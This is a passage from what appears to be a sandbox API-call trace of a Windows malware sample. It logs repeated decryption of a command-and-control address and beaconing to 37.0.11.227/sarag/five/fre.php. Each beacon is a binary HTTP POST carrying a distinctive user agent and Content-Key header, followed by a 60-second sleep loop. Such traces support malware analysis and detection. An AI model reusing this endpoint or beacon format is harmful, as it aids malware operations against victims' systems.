hHeap=0x690000) returned 1 [0308.987] GetProcessHeap () returned 0x690000 [0308.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0308.988] GetProcessHeap () returned 0x690000 [0308.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0308.988] GetProcessHeap () returned 0x690000 [0308.988] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0308.988] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x714) returned 0xa48 [0308.990] Sleep (dwMilliseconds=0xea60) [0308.991] GetProcessHeap () returned 0x690000 [0308.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0308.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0308.994] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0309.009] GetProcessHeap () returned 0x690000 [0309.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0309.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.010] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.011] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.012] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.012] GetProcessHeap () returned 0x690000 [0309.013] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0309.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.013] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0309.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.019] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.022] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0309.022] GetProcessHeap () returned 0x690000 [0309.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0309.024] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.024] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.034] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.035] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.035] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.039] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.039] GetProcessHeap () returned 0x690000 [0309.039] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0309.039] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.040] GetProcessHeap () returned 0x690000 [0309.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0309.040] GetProcessHeap () returned 0x690000 [0309.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0309.041] GetProcessHeap () returned 0x690000 [0309.041] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0309.041] GetProcessHeap () returned 0x690000 [0309.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0309.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.042] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.047] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.048] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0309.053] GetProcessHeap () returned 0x690000 [0309.053] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0309.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.056] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.057] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.060] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.060] GetProcessHeap () returned 0x690000 [0309.060] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0309.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.061] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0309.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.062] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.064] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0309.064] GetProcessHeap () returned 0x690000 [0309.064] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.065] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0309.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.066] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0309.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.067] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0309.068] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.068] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0309.068] GetProcessHeap () returned 0x690000 [0309.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0309.068] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0309.068] GetProcessHeap () returned 0x690000 [0309.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3c0 [0309.068] socket (af=2, type=1, protocol=6) returned 0xa4c [0309.071] connect (s=0xa4c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0309.096] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0309.096] GetProcessHeap () returned 0x690000 [0309.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0309.096] GetProcessHeap () returned 0x690000 [0309.096] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0309.096] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.097] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.097] GetProcessHeap () returned 0x690000 [0309.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0309.097] GetProcessHeap () returned 0x690000 [0309.098] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0309.098] GetProcessHeap () returned 0x690000 [0309.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0309.098] GetProcessHeap () returned 0x690000 [0309.098] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0309.099] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.100] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.100] GetProcessHeap () returned 0x690000 [0309.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0309.100] GetProcessHeap () returned 0x690000 [0309.101] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0309.101] send (s=0xa4c, buf=0x6ad508*, len=242, flags=0) returned 242 [0309.101] send (s=0xa4c, buf=0x6aba40*, len=159, flags=0) returned 159 [0309.101] GetProcessHeap () returned 0x690000 [0309.101] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0309.101] recv (in: s=0xa4c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0309.192] GetProcessHeap () returned 0x690000 [0309.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0309.193] GetProcessHeap () returned 0x690000 [0309.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0309.193] GetProcessHeap () returned 0x690000 [0309.193] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0309.193] GetProcessHeap () returned 0x690000 [0309.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0309.194] closesocket (s=0xa4c) returned 0 [0309.194] GetProcessHeap () returned 0x690000 [0309.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3c0 | out: hHeap=0x690000) returned 1 [0309.194] GetProcessHeap () returned 0x690000 [0309.194] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.195] GetProcessHeap () returned 0x690000 [0309.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0309.195] GetProcessHeap () returned 0x690000 [0309.195] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0309.196] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x708) returned 0xa4c [0309.197] Sleep (dwMilliseconds=0xea60) [0309.199] GetProcessHeap () returned 0x690000 [0309.199] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0309.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.206] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0309.211] GetProcessHeap () returned 0x690000 [0309.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0309.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.212] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.212] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.213] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.213] GetProcessHeap () returned 0x690000 [0309.214] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0309.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.215] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0309.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.241] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.242] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0309.242] GetProcessHeap () returned 0x690000 [0309.242] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.243] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.244] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.245] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.246] GetProcessHeap () returned 0x690000 [0309.246] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0309.246] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.246] GetProcessHeap () returned 0x690000 [0309.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0309.246] GetProcessHeap () returned 0x690000 [0309.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.247] GetProcessHeap () returned 0x690000 [0309.247] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0309.247] GetProcessHeap () returned 0x690000 [0309.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0309.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.248] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.252] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.253] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0309.259] GetProcessHeap () returned 0x690000 [0309.259] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0309.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.260] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0309.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.261] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.262] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.262] GetProcessHeap () returned 0x690000 [0309.263] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0309.263] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.263] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0309.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.264] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0309.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.265] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0309.265] GetProcessHeap () returned 0x690000 [0309.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0309.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.266] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0309.268] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.268] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0309.269] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.269] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0309.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0309.270] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0309.270] GetProcessHeap () returned 0x690000 [0309.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0309.270] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0309.270] GetProcessHeap () returned 0x690000 [0309.270] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0309.270] socket (af=2, type=1, protocol=6) returned 0xa50 [0309.270] connect (s=0xa50, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0309.295] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0309.295] GetProcessHeap () returned 0x690000 [0309.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0309.296] GetProcessHeap () returned 0x690000 [0309.296] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cb7d0 [0309.296] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.297] wvsprintfA (in: param_1=0x6cb7d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.297] GetProcessHeap () returned 0x690000 [0309.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0309.297] GetProcessHeap () returned 0x690000 [0309.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cb7d0 | out: hHeap=0x690000) returned 1 [0309.298] GetProcessHeap () returned 0x690000 [0309.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0309.298] GetProcessHeap () returned 0x690000 [0309.298] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cb7d0 [0309.299] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0309.299] wvsprintfA (in: param_1=0x6cb7d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.299] GetProcessHeap () returned 0x690000 [0309.299] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0309.299] GetProcessHeap () returned 0x690000 [0309.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cb7d0 | out: hHeap=0x690000) returned 1 [0309.300] send (s=0xa50, buf=0x6ad508*, len=242, flags=0) returned 242 [0309.300] send (s=0xa50, buf=0x6aba40*, len=159, flags=0) returned 159 [0309.300] GetProcessHeap () returned 0x690000 [0309.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0309.300] recv (in: s=0xa50, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0309.382] GetProcessHeap () returned 0x690000 [0309.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0309.383] GetProcessHeap () returned 0x690000 [0309.383] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0309.383] GetProcessHeap () returned 0x690000 [0309.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0309.384] GetProcessHeap () returned 0x690000 [0309.384] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0309.384] closesocket (s=0xa50) returned 0 [0309.385] GetProcessHeap () returned 0x690000 [0309.385] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab360 | out: hHeap=0x690000) returned 1 [0309.385] GetProcessHeap () returned 0x690000 [0309.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0309.386] GetProcessHeap () returned 0x690000 [0309.386] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0309.386] GetProcessHeap () returned 0x690000 [0309.387] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0309.387] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd38) returned 0xa50 [0309.390] Sleep (dwMilliseconds=0xea60) [0309.392] GetProcessHeap () returned 0x690000 [0309.392] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0309.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.394] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0309.401] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, 